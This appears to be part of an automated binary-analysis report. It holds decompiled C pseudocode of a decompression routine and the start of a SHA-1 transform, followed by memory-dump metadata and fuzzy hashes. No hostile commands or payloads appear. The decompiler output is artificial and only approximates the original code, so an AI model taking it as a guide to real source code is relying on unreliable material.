                												if(_t619 != 0x100) {
                													__eflags = _t619 - 0x101;
                													if(_t619 != 0x101) {
                														_t620 = _t619 + 0xfffffefe;
                														__eflags = _t620;
                														_t518 =  &((_t663 + 0x60)[_t620]);
                														_t491 =  *_t518;
                														 *(_t691 + 0x24) = _t491;
                														if(_t620 == 0) {
                															L122:
                															_t668 = _t654 + 4;
                															 *(_t663 + 0x60) = _t491;
                															_t357 = E00CAA4ED(_t668);
                															_t358 =  *(_t654 + 0x2d78);
                															_t622 = _t357 & 0x0000fffe;
                															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
                															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
                																_t492 = 0xf;
                																_t359 = _t358 + 1;
                																__eflags = _t359 - _t492;
                																if(_t359 >= _t492) {
                																	L130:
                																	_t521 =  *(_t668 + 4) + _t492;
                																	 *(_t668 + 4) = _t521 & 0x00000007;
                																	_t361 = _t521 >> 3;
                																	 *_t668 =  *_t668 + _t361;
                																	_t523 = 0x10;
                																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
                																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
                																	asm("sbb eax, eax");
                																	_t362 = _t361 & _t526;
                																	__eflags = _t362;
                																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
                																	L131:
                																	_t493 = _t363 & 0x0000ffff;
                																	__eflags = _t493 - 8;
                																	if(_t493 >= 8) {
                																		_t671 = (_t493 >> 2) - 1;
                																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
                																		__eflags = _t493;
                																	} else {
                																		_t671 = 0;
                																	}
                																	_t496 = _t493 + 2;
                																	__eflags = _t671;
                																	if(_t671 != 0) {
                																		_t390 = E00CAA4ED(_t654 + 4);
                																		_t532 = 0x10;
                																		_t496 = _t496 + (_t390 >> _t532 - _t671);
                																		_t535 =  *(_t654 + 8) + _t671;
                																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
                																		_t536 = _t535 & 0x00000007;
                																		__eflags = _t536;
                																		 *(_t654 + 8) = _t536;
                																	}
                																	_t625 =  *(_t663 + 0x7c);
                																	_t673 = _t625 -  *(_t691 + 0x24);
                																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
                																	 *(_t663 + 0x74) = _t496;
                																	__eflags = _t673 - _t365;
                																	if(_t673 >= _t365) {
                																		L147:
                																		_t347 = _t654 + 4;
                																		__eflags = _t496;
                																		if(_t496 == 0) {
                																			goto L7;
                																		}
                																		_t655 =  *(_t663 + 0xe6dc);
                																		do {
                																			_t656 = _t655 & _t673;
                																			_t673 = _t673 + 1;
                																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
                																			_t655 =  *(_t663 + 0xe6dc);
                																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
                																			_t496 = _t496 - 1;
                																			__eflags = _t496;
                																		} while (_t496 != 0);
                																		L150:
                																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
                																		L33:
                																		_t347 = _t654 + 4;
                																		goto L7;
                																	} else {
                																		__eflags = _t625 - _t365;
                																		if(_t625 >= _t365) {
                																			goto L147;
                																		}
                																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
                																		_t675 = _t673 + _t370;
                																		_t529 = _t370 + _t625;
                																		 *(_t691 + 0x1c) = _t529;
                																		 *(_t663 + 0x7c) = _t625 + _t496;
                																		__eflags =  *(_t691 + 0x24) - _t496;
                																		if( *(_t691 + 0x24) >= _t496) {
                																			__eflags = _t496 - 8;
                																			if(_t496 < 8) {
                																				L85:
                																				_t347 = _t654 + 4;
                																				__eflags = _t498;
                																				if(_t498 == 0) {
                																					L7:
                																					L8:
                																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
                																					while(1) {
                																						_t614 =  *(_t663 + 0xe6dc);
                																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
                																						_t506 =  *_t347;
                																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
                																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
                																							goto L16;
                																						}
                																						goto L10;
                																					}
                																				}
                																				 *_t529 =  *_t675;
                																				_t347 = _t654 + 4;
                																				__eflags = _t498 - 1;
                																				if(_t498 <= 1) {
                																					goto L7;
                																				}
                																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
                																				_t347 = _t654 + 4;
                																				__eflags = _t498 - 2;
                																				if(_t498 <= 2) {
                																					goto L7;
                																				}
                																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
                																				_t347 = _t654 + 4;
                																				__eflags = _t498 - 3;
                																				if(_t498 <= 3) {
                																					goto L7;
                																				}
                																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
                																				_t347 = _t654 + 4;
                																				__eflags = _t498 - 4;
                																				if(_t498 <= 4) {
                																					goto L7;
                																				}
                																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
                																				_t347 = _t654 + 4;
                																				__eflags = _t498 - 5;
                																				if(_t498 <= 5) {
                																					goto L7;
                																				}
                																				__eflags = _t498 - 6;
                																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
                																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
                																				_t347 = _t654 + 4;
                																				if(_t498 > 6) {
                																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
                																					_t347 = _t654 + 4;
                																				}
                																				goto L8;
                																			}
                																			_t380 = _t496 >> 3;
                																			__eflags = _t380;
                																			 *(_t691 + 0x24) = _t380;
                																			_t657 = _t380;
                																			do {
                																				E00CBEA80(_t529, _t675, 8);
                																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
                																				_t691 = _t691 + 0xc;
                																				_t529 = _t530 + 8;
                																				_t675 = _t675 + 8;
                																				_t496 = _t496 - 8;
                																				 *(_t691 + 0x1c) = _t529;
                																				_t657 = _t657 - 1;
                																				__eflags = _t657;
                																			} while (_t657 != 0);
                																			L84:
                																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
                																			goto L85;
                																		}
                																		__eflags = _t496 - 8;
                																		if(_t496 < 8) {
                																			goto L85;
                																		}
                																		_t628 = _t496 >> 3;
                																		__eflags = _t628;
                																		do {
                																			_t496 = _t496 - 8;
                																			 *_t529 =  *_t675;
                																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
                																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
                																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
                																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
                																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
                																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
                																			_t389 =  *((intOrPtr*)(_t675 + 7));
                																			_t675 = _t675 + 8;
                																			 *((char*)(_t529 + 7)) = _t389;
                																			_t529 = _t529 + 8;
                																			_t628 = _t628 - 1;
                																			__eflags = _t628;
                																		} while (_t628 != 0);
                																		goto L85;
                																	}
                																}
                																_t538 = _t654 + (_t359 + 0xb3e) * 4;
                																while(1) {
                																	__eflags = _t622 -  *_t538;
                																	if(_t622 <  *_t538) {
                																		break;
                																	}
                																	_t359 = _t359 + 1;
                																	_t538 = _t538 + 4;
                																	__eflags = _t359 - 0xf;
                																	if(_t359 < 0xf) {
                																		continue;
                																	}
                																	goto L130;
                																}
                																_t492 = _t359;
                																goto L130;
                															}
                															_t539 = 0x10;
                															_t629 = _t622 >> _t539 - _t358;
                															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
                															 *_t668 =  *_t668 + (_t542 >> 3);
                															 *(_t668 + 4) = _t542 & 0x00000007;
                															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
                															goto L131;
                														} else {
                															goto L121;
                														}
                														do {
                															L121:
                															 *_t518 =  *(_t518 - 4);
                															_t518 = _t518 - 4;
                															_t620 = _t620 - 1;
                															__eflags = _t620;
                														} while (_t620 != 0);
                														goto L122;
                													}
                													_t498 =  *(_t663 + 0x74);
                													_t666 =  *((intOrPtr*)(_t691 + 0x14));
                													__eflags = _t498;
                													if(_t498 == 0) {
                														L23:
                														_t499 =  *((intOrPtr*)(_t691 + 0x10));
                														continue;
                													}
                													_t397 =  *(_t663 + 0x60);
                													_t630 =  *(_t663 + 0x7c);
                													_t677 = _t630 - _t397;
                													 *(_t691 + 0x1c) = _t397;
                													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
                													__eflags = _t677 - _t399;
                													if(_t677 >= _t399) {
                														L116:
                														_t347 = _t654 + 4;
                														__eflags = _t498;
                														if(_t498 == 0) {
                															goto L7;
                														}
                														_t658 =  *(_t663 + 0xe6dc);
                														do {
                															_t659 = _t658 & _t677;
                															_t677 = _t677 + 1;
                															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
                															_t658 =  *(_t663 + 0xe6dc);
                															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
                															_t498 = _t498 - 1;
                															__eflags = _t498;
                														} while (_t498 != 0);
                														goto L150;
                													}
                													__eflags = _t630 - _t399;
                													if(_t630 >= _t399) {
                														goto L116;
                													}
                													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
                													_t675 = _t677 + _t404;
                													_t529 = _t404 + _t630;
                													 *(_t691 + 0x24) = _t529;
                													 *(_t663 + 0x7c) = _t630 + _t498;
                													__eflags =  *(_t691 + 0x1c) - _t498;
                													if( *(_t691 + 0x1c) >= _t498) {
                														__eflags = _t498 - 8;
                														if(_t498 < 8) {
                															goto L85;
                														}
                														_t407 = _t498 >> 3;
                														__eflags = _t407;
                														_t660 = _t407;
                														do {
                															E00CBEA80(_t529, _t675, 8);
                															_t545 =  *((intOrPtr*)(_t691 + 0x30));
                															_t691 = _t691 + 0xc;
                															_t529 = _t545 + 8;
                															_t675 = _t675 + 8;
                															_t498 = _t498 - 8;
                															 *(_t691 + 0x24) = _t529;
                															_t660 = _t660 - 1;
                															__eflags = _t660;
                														} while (_t660 != 0);
                														goto L84;
                													}
                													__eflags = _t498 - 8;
                													if(_t498 < 8) {
                														goto L85;
                													}
                													_t633 = _t498 >> 3;
                													__eflags = _t633;
                													do {
                														_t498 = _t498 - 8;
                														 *_t529 =  *_t675;
                														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
                														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
                														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
                														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
                														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
                														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
                														_t416 =  *((intOrPtr*)(_t675 + 7));
                														_t675 = _t675 + 8;
                														 *((char*)(_t529 + 7)) = _t416;
                														_t529 = _t529 + 8;
                														_t633 = _t633 - 1;
                														__eflags = _t633;
                													} while (_t633 != 0);
                													goto L85;
                												}
                												_push(_t691 + 0x28);
                												_t417 = E00CB3564(_t663, _t347);
                												__eflags = _t417;
                												if(_t417 == 0) {
                													goto L100;
                												}
                												_t420 = E00CB1A0E(_t663, _t691 + 0x28);
                												__eflags = _t420;
                												if(_t420 != 0) {
                													goto L33;
                												}
                												goto L100;
                											}
                											_t501 = _t619 - 0x106;
                											__eflags = _t501 - 8;
                											if(_t501 >= 8) {
                												_t680 = (_t501 >> 2) - 1;
                												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
                												__eflags = _t501;
                											} else {
                												_t680 = 0;
                											}
                											_t498 = _t501 + 2;
                											__eflags = _t680;
                											if(_t680 == 0) {
                												_t681 = _t654 + 4;
                											} else {
                												_t472 = E00CAA4ED(_t347);
                												_t600 = 0x10;
                												_t498 = _t498 + (_t472 >> _t600 - _t680);
                												_t603 =  *(_t654 + 8) + _t680;
                												_t681 = _t654 + 4;
                												 *_t681 =  *_t681 + (_t603 >> 3);
                												 *(_t681 + 4) = _t603 & 0x00000007;
                											}
                											_t421 = E00CAA4ED(_t681);
                											_t422 =  *(_t654 + 0xfa0);
                											_t635 = _t421 & 0x0000fffe;
                											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
                											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
                												_t682 = 0xf;
                												_t423 = _t422 + 1;
                												__eflags = _t423 - _t682;
                												if(_t423 >= _t682) {
                													L49:
                													_t552 =  *(_t654 + 8) + _t682;
                													 *(_t654 + 8) = _t552 & 0x00000007;
                													_t425 = _t552 >> 3;
                													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
                													_t554 = 0x10;
                													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
                													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
                													asm("sbb eax, eax");
                													_t426 = _t425 & _t557;
                													__eflags = _t426;
                													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
                													goto L50;
                												}
                												_t593 = _t654 + (_t423 + 0x3c8) * 4;
                												while(1) {
                													__eflags = _t635 -  *_t593;
                													if(_t635 <  *_t593) {
                														break;
                													}
                													_t423 = _t423 + 1;
                													_t593 = _t593 + 4;
                													__eflags = _t423 - 0xf;
                													if(_t423 < 0xf) {
                														continue;
                													}
                													goto L49;
                												}
                												_t682 = _t423;
                												goto L49;
                											} else {
                												_t594 = 0x10;
                												_t652 = _t635 >> _t594 - _t422;
                												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
                												 *_t681 =  *_t681 + (_t597 >> 3);
                												 *(_t681 + 4) = _t597 & 0x00000007;
                												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
                												L50:
                												_t638 = _t427 & 0x0000ffff;
                												__eflags = _t638 - 4;
                												if(_t638 >= 4) {
                													_t430 = (_t638 >> 1) - 1;
                													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
                													__eflags = _t638;
                												} else {
                													_t430 = 0;
                												}
                												 *(_t691 + 0x18) = _t430;
                												_t559 = _t638 + 1;
                												 *(_t691 + 0x24) = _t559;
                												_t683 = _t559;
                												 *(_t691 + 0x1c) = _t683;
                												__eflags = _t430;
                												if(_t430 == 0) {
                													L70:
                													__eflags = _t683 - 0x100;
                													if(_t683 > 0x100) {
                														_t498 = _t498 + 1;
                														__eflags = _t683 - 0x2000;
                														if(_t683 > 0x2000) {
                															_t498 = _t498 + 1;
                															__eflags = _t683 - 0x40000;
                															if(_t683 > 0x40000) {
                																_t498 = _t498 + 1;
                																__eflags = _t498;
                															}
                														}
                													}
                													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
                													 *(_t663 + 0x68) =  *(_t663 + 0x64);
                													 *(_t663 + 0x64) =  *(_t663 + 0x60);
                													 *(_t663 + 0x60) = _t683;
                													_t641 =  *(_t663 + 0x7c);
                													_t561 = _t641 - _t683;
                													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
                													 *(_t663 + 0x74) = _t498;
                													 *(_t691 + 0x24) = _t561;
                													__eflags = _t561 - _t435;
                													if(_t561 >= _t435) {
                														L93:
                														_t666 =  *((intOrPtr*)(_t691 + 0x14));
                														_t347 = _t654 + 4;
                														__eflags = _t498;
                														if(_t498 == 0) {
                															goto L23;
                														}
                														_t684 =  *(_t663 + 0xe6dc);
                														_t661 =  *(_t691 + 0x24);
                														do {
                															_t685 = _t684 & _t661;
                															_t661 = _t661 + 1;
                															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
                															_t684 =  *(_t663 + 0xe6dc);
                															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
                															_t498 = _t498 - 1;
                															__eflags = _t498;
                														} while (_t498 != 0);
                														goto L150;
                													} else {
                														__eflags = _t641 - _t435;
                														if(_t641 >= _t435) {
                															goto L93;
                														}
                														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
                														_t675 = _t440 + _t561;
                														_t529 = _t440 + _t641;
                														 *(_t691 + 0x24) = _t529;
                														 *(_t663 + 0x7c) = _t641 + _t498;
                														__eflags =  *(_t691 + 0x1c) - _t498;
                														if( *(_t691 + 0x1c) >= _t498) {
                															__eflags = _t498 - 8;
                															if(_t498 < 8) {
                																goto L85;
                															}
                															_t443 = _t498 >> 3;
                															__eflags = _t443;
                															 *(_t691 + 0x1c) = _t443;
                															_t662 = _t443;
                															do {
                																E00CBEA80(_t529, _t675, 8);
                																_t563 =  *((intOrPtr*)(_t691 + 0x30));
                																_t691 = _t691 + 0xc;
                																_t529 = _t563 + 8;
                																_t675 = _t675 + 8;
                																_t498 = _t498 - 8;
                																 *(_t691 + 0x24) = _t529;
                																_t662 = _t662 - 1;
                																__eflags = _t662;
                															} while (_t662 != 0);
                															goto L84;
                														}
                														__eflags = _t498 - 8;
                														if(_t498 < 8) {
                															goto L85;
                														}
                														_t644 = _t498 >> 3;
                														__eflags = _t644;
                														do {
                															_t498 = _t498 - 8;
                															 *_t529 =  *_t675;
                															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
                															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
                															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
                															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
                															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
                															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
                															_t452 =  *((intOrPtr*)(_t675 + 7));
                															_t675 = _t675 + 8;
                															 *((char*)(_t529 + 7)) = _t452;
                															_t529 = _t529 + 8;
                															_t644 = _t644 - 1;
                															__eflags = _t644;
                														} while (_t644 != 0);
                														goto L85;
                													}
                												} else {
                													__eflags = _t430 - 4;
                													if(__eflags < 0) {
                														_t453 = E00CB7D76(_t654 + 4);
                														_t565 = 0x20;
                														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
                														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
                														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
                														_t569 = _t568 & 0x00000007;
                														__eflags = _t569;
                														 *(_t654 + 8) = _t569;
                														L69:
                														 *(_t691 + 0x1c) = _t683;
                														goto L70;
                													}
                													if(__eflags <= 0) {
                														_t645 = _t654 + 4;
                													} else {
                														_t467 = E00CB7D76(_t654 + 4);
                														_t651 =  *(_t691 + 0x18);
                														_t587 = 0x24;
                														_t590 = _t651 - 4 +  *(_t654 + 8);
                														_t645 = _t654 + 4;
                														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
                														 *_t645 =  *_t645 + (_t590 >> 3);
                														 *(_t645 + 4) = _t590 & 0x00000007;
                													}
                													_t456 = E00CAA4ED(_t645);
                													_t457 =  *(_t654 + 0x1e8c);
                													_t647 = _t456 & 0x0000fffe;
                													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
                													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
                														_t571 = 0xf;
                														_t458 = _t457 + 1;
                														 *(_t691 + 0x18) = _t571;
                														__eflags = _t458 - _t571;
                														if(_t458 >= _t571) {
                															L66:
                															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
                															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
                															_t461 =  *(_t691 + 0x18);
                															 *(_t654 + 8) = _t573 & 0x00000007;
                															_t575 = 0x10;
                															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
                															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
                															asm("sbb eax, eax");
                															_t462 = _t461 & _t578;
                															__eflags = _t462;
                															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
                															goto L67;
                														}
                														_t580 = _t654 + (_t458 + 0x783) * 4;
                														while(1) {
                															__eflags = _t647 -  *_t580;
                															if(_t647 <  *_t580) {
                																break;
                															}
                															_t458 = _t458 + 1;
                															_t580 = _t580 + 4;
                															__eflags = _t458 - 0xf;
                															if(_t458 < 0xf) {
                																continue;
                															}
                															goto L66;
                														}
                														 *(_t691 + 0x18) = _t458;
                														goto L66;
                													} else {
                														_t581 = 0x10;
                														_t650 = _t647 >> _t581 - _t457;
                														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
                														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
                														 *(_t654 + 8) = _t584 & 0x00000007;
                														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
                														L67:
                														_t683 = _t683 + (_t463 & 0x0000ffff);
                														goto L69;
                													}
                												}
                											}
                										}
                										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
                										_t69 = _t663 + 0x7c;
                										 *_t69 =  *(_t663 + 0x7c) + 1;
                										__eflags =  *_t69;
                										goto L33;
                									}
                									_t607 = _t654 + (_t353 + 0xd) * 4;
                									while(1) {
                										__eflags = _t616 -  *_t607;
                										if(_t616 <  *_t607) {
                											break;
                										}
                										_t353 = _t353 + 1;
                										_t607 = _t607 + 4;
                										__eflags = _t353 - 0xf;
                										if(_t353 < 0xf) {
                											continue;
                										}
                										goto L30;
                									}
                									_t490 = _t353;
                									goto L30;
                								}
                								_t608 = 0x10;
                								_t653 = _t616 >> _t608 - _t352;
                								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
                								 *_t667 =  *_t667 + (_t611 >> 3);
                								_t347 = _t654 + 4;
                								 *(_t347 + 4) = _t611 & 0x00000007;
                								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
                								goto L31;
                							}
                							__eflags = _t507 -  *(_t663 + 0x7c);
                							if(_t507 ==  *(_t663 + 0x7c)) {
                								goto L21;
                							}
                							E00CB47DA(_t663);
                							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
                							if(__eflags > 0) {
                								L152:
                								_t418 = 0;
                								goto L101;
                							}
                							if(__eflags < 0) {
                								goto L21;
                							}
                							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
                							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
                								goto L152;
                							}
                							goto L21;
                						}
                					}
                				}
                				 *((char*)(_t654 + 0x2c)) = 1;
                				_push(_t654 + 0x30);
                				_push(_t654 + 0x18);
                				_push(_t654 + 4);
                				if(E00CB397F(__ecx) != 0) {
                					goto L3;
                				}
                				goto L2;
                			}


                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
                • Instruction ID: af45a7816f782e8e7d56931b0294614404ec750e46000f58d2cbc648868cb373
                • Opcode Fuzzy Hash: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
                • Instruction Fuzzy Hash: F062F4706087869FC719CF38C8905F9BBE1BB95304F14866EE8AA8B741D734EA56CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E00CAE973(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
                				signed int _v4;
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int* _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _t429;
                				intOrPtr _t431;
                				intOrPtr _t436;
                				void* _t441;
                				intOrPtr _t443;
                				signed int _t446;
                				void* _t448;
                				signed int _t454;
                				signed int _t460;
                				signed int _t466;
                				signed int _t474;
                				signed int _t482;
                				signed int _t489;
                				signed int _t512;
                				signed int _t519;
                				signed int _t526;
                				signed int _t546;
                				signed int _t555;
                				signed int _t564;
                				signed int* _t592;
                				signed int _t593;
                				signed int _t595;
                				signed int _t596;
                				signed int* _t597;
                				signed int _t598;
                				signed int _t599;
                				signed int _t601;
                				signed int _t603;
                				signed int _t604;
                				signed int* _t605;
                				signed int _t606;
                				signed int* _t670;
                				signed int* _t741;
                				signed int _t752;
                				signed int _t769;
                				signed int _t773;
                				signed int _t777;
                				signed int _t781;
                				signed int _t782;
                				signed int _t786;
                				signed int _t787;
                				signed int _t791;
                				signed int _t796;
                				signed int _t800;
                				signed int _t804;
                				signed int _t806;
                				signed int _t809;
                				signed int _t810;
                				signed int* _t811;
                				signed int _t814;
                				signed int _t815;
                				signed int _t816;
                				signed int _t820;
                				signed int _t821;
                				signed int _t825;
                				signed int _t830;
                				signed int _t834;
                				signed int _t838;
                				signed int* _t839;
                				signed int _t841;
                				signed int _t842;
                				signed int _t844;
                				signed int _t845;
                				signed int _t847;
                				signed int* _t848;
                				signed int _t851;
                				signed int* _t854;
                				signed int _t855;
                				signed int _t857;
                				signed int _t858;
                				signed int _t862;
                				signed int _t863;
                				signed int _t867;
                				signed int _t871;
                				signed int _t875;
                				signed int _t879;
                				signed int _t880;
                				signed int* _t881;
                				signed int _t882;
                				signed int _t884;
                				signed int _t885;
                				signed int _t886;
                				signed int _t887;
                				signed int _t888;
                				signed int _t890;
                				signed int _t891;
                				signed int _t893;
                				signed int _t894;
                				signed int _t896;
                				signed int _t897;
                				signed int* _t898;
                				signed int _t899;
                				signed int _t901;
                				signed int _t902;
                				signed int _t904;
                				signed int _t905;
                
                				_t906 =  &_v28;
                				if(_a16 == 0) {
                					_t839 = _a8;
                					_v20 = _t839;
                					E00CBEA80(_t839, _a12, 0x40);
                					_t906 =  &(( &_v28)[3]);
                				} else {
                					_t839 = _a12;
                					_v20 = _t839;
                				}
                				_t848 = _a4;
                				_t593 =  *_t848;
                				_t886 = _t848[1];
                				_a12 = _t848[2];
                				_a16 = _t848[3];
                				_v24 = 0;
                				_t429 = E00CC5604( *_t839);
                				asm("rol edx, 0x5");
                				 *_t839 = _t429;
                				_t851 = _t848[4] + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t429;
                				_t430 = _t839;
                				asm("ror ebp, 0x2");
                				_v16 = _t839;
                				_a8 =  &(_t839[3]);
                				do {
                					_t431 = E00CC5604(_t430[1]);
                					asm("rol edx, 0x5");
                					 *((intOrPtr*)(_v16 + 4)) = _t431;
                					asm("ror ebx, 0x2");
                					_a16 = _a16 + 0x5a827999 + ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t431;
                					_t436 = E00CC5604( *((intOrPtr*)(_a8 - 4)));
                					asm("rol edx, 0x5");
                					 *((intOrPtr*)(_a8 - 4)) = _t436;
                					asm("ror esi, 0x2");
                					_a12 = _a12 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _a16 + _t436;
                					_t441 = E00CC5604( *_a8);
                					asm("rol edx, 0x5");
                					 *_a8 = _t441;
                					asm("ror dword [esp+0x48], 0x2");
                					_t886 = _t886 + ((_t851 ^ _t593) & _a16 ^ _t593) + _a12 + 0x5a827999 + _t441;
                					_t443 = E00CC5604( *((intOrPtr*)(_a8 + 4)));
                					_a8 = _a8 + 0x14;
                					asm("rol edx, 0x5");
                					 *((intOrPtr*)(_a8 + 4)) = _t443;
                					_t446 = _v24 + 5;
                					asm("ror dword [esp+0x48], 0x2");
                					_v24 = _t446;
                					_t593 = _t593 + ((_t851 ^ _a16) & _a12 ^ _t851) + _t886 + _t443 + 0x5a827999;
                					_v16 =  &(_t839[_t446]);
                					_t448 = E00CC5604(_t839[_t446]);
                					_t906 =  &(_t906[5]);
                					asm("rol edx, 0x5");
                					 *_v16 = _t448;
                					_t430 = _v16;
                					asm("ror ebp, 0x2");
